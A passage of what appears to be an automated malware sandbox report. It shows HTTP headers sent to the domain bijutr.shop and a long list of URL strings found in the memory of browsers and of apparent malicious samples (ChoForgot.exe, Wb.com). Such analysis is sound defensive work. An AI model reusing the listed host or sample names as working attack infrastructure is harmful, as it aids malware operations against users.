                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: bijutr.shop
                    Content-Length: 256
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
                Source: chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641961362.000047E400AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                Source: chrome.exe, 00000011.00000002.2641961362.000047E400AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279Q
                Source: chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2637078288.000047E400013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2706167310.00005B8002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488/
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                Source: chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641961362.000047E400AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761e-data
                Source: chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640778355.000047E4007E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                Source: chrome.exe, 00000011.00000002.2640056642.000047E400630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640417345.000047E4006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                Source: chrome.exe, 00000011.00000002.2640056642.000047E400630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280G
                Source: ChoForgot.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: ChoForgot.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: ChoForgot.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
                Source: chrome.exe, 00000011.00000002.2640262507.000047E400688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                Source: ChoForgot.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                Source: ChoForgot.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                Source: ChoForgot.exe, Wb.com.2.dr, Improve.9.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: ChoForgot.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: ChoForgot.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: ChoForgot.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: chrome.exe, 00000011.00000002.2637619690.000047E4000EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.chrome.com/extensions/external_extensions.html)
                Source: chrome.exe, 00000011.00000002.2637436088.000047E40008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                Source: chrome.exe, 00000011.00000003.2562051348.000047E401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562106489.000047E400F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2561992788.000047E401038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562230107.000047E401064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
                Source: ChoForgot.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: ChoForgot.exeString found in binary or memory: http://ocsp.digicert.com0A
                Source: ChoForgot.exeString found in binary or memory: http://ocsp.digicert.com0C
                Source: ChoForgot.exeString found in binary or memory: http://ocsp.digicert.com0X
                Source: ChoForgot.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                Source: ChoForgot.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                Source: ChoForgot.exeString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                Source: chrome.exe, 00000011.00000003.2563420053.000047E400FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563294728.000047E400484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562051348.000047E401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562106489.000047E400F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2561992788.000047E401038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563818278.000047E4010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563325160.000047E400A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563354255.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562078960.000047E401098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2564082691.000047E40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563702916.000047E4003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641447831.000047E4009B3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562230107.000047E401064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2578349324.000047E400E38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563598629.000047E400E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                Source: chrome.exe, 00000011.00000003.2563420053.000047E400FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563294728.000047E400484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562051348.000047E401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562106489.000047E400F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2561992788.000047E401038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563818278.000047E4010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563325160.000047E400A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563354255.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562078960.000047E401098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2564082691.000047E40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563702916.000047E4003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641447831.000047E4009B3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562230107.000047E401064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2578349324.000047E400E38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563598629.000047E400E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                Source: chrome.exe, 00000011.00000003.2563420053.000047E400FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563294728.000047E400484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562051348.000047E401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562106489.000047E400F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2561992788.000047E401038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563818278.000047E4010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563325160.000047E400A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563354255.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562078960.000047E401098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2564082691.000047E40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563702916.000047E4003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641447831.000047E4009B3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562230107.000047E401064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2578349324.000047E400E38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563598629.000047E400E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
                Source: chrome.exe, 00000011.00000003.2563420053.000047E400FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563294728.000047E400484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562051348.000047E401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562106489.000047E400F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2561992788.000047E401038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563818278.000047E4010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563325160.000047E400A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563354255.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562078960.000047E401098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2564082691.000047E40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563702916.000047E4003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641447831.000047E4009B3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2562230107.000047E401064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2578349324.000047E400E38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563598629.000047E400E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
                Source: chrome.exe, 00000011.00000002.2641275257.000047E400900000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2637375236.000047E400080000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
                Source: chrome.exe, 00000011.00000002.2641447831.000047E400994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
                Source: chrome.exe, 00000011.00000002.2641447831.000047E400994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certsG
                Source: ChoForgot.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                Source: ChoForgot.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                Source: ChoForgot.exeString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                Source: chrome.exe, 00000011.00000002.2641605337.000047E4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
                Source: Wb.com, 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp, Wb.com.2.dr, Ensures.9.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                Source: chrome.exe, 00000011.00000002.2641749171.000047E400A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
                Source: Wb.com, 0000000C.00000002.3031181433.00000000045E3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2642382450.000047E400C0C000.00000004.00000800.00020000.00000000.sdmp, MO8G47.12.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
                Source: chrome.exe, 00000011.00000002.2637512561.000047E400098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639001052.000047E40040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639104639.000047E400494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2637078288.000047E400013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                Source: chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/G
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
                Source: chrome.exe, 00000011.00000003.2556554315.000047E400BE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2560352500.000047E400BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
                Source: chrome.exe, 00000011.00000003.2560352500.000047E400BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardG
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
                Source: chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
                Source: chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/MergeSession
                Source: chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/OAuthLogin
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
                Source: chrome.exe, 00000011.00000002.2640691773.000047E4007C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
                Source: chrome.exe, 00000011.00000003.2580999674.000047E4002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
                Source: chrome.exe, 00000011.00000003.2580999674.000047E4002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
                Source: chrome.exe, 00000011.00000002.2637542005.000047E4000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
                Source: chrome.exe, 00000011.00000002.2637542005.000047E4000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
                Source: chrome.exe, 00000011.00000002.2637542005.000047E4000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
                Source: chrome.exe, 00000011.00000002.2637512561.000047E400098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com:443
                Source: chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.dr, HubApps Icons.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.dr, HubApps Icons.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.dr, HubApps Icons.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.dr, HubApps Icons.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
                Source: chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/$l
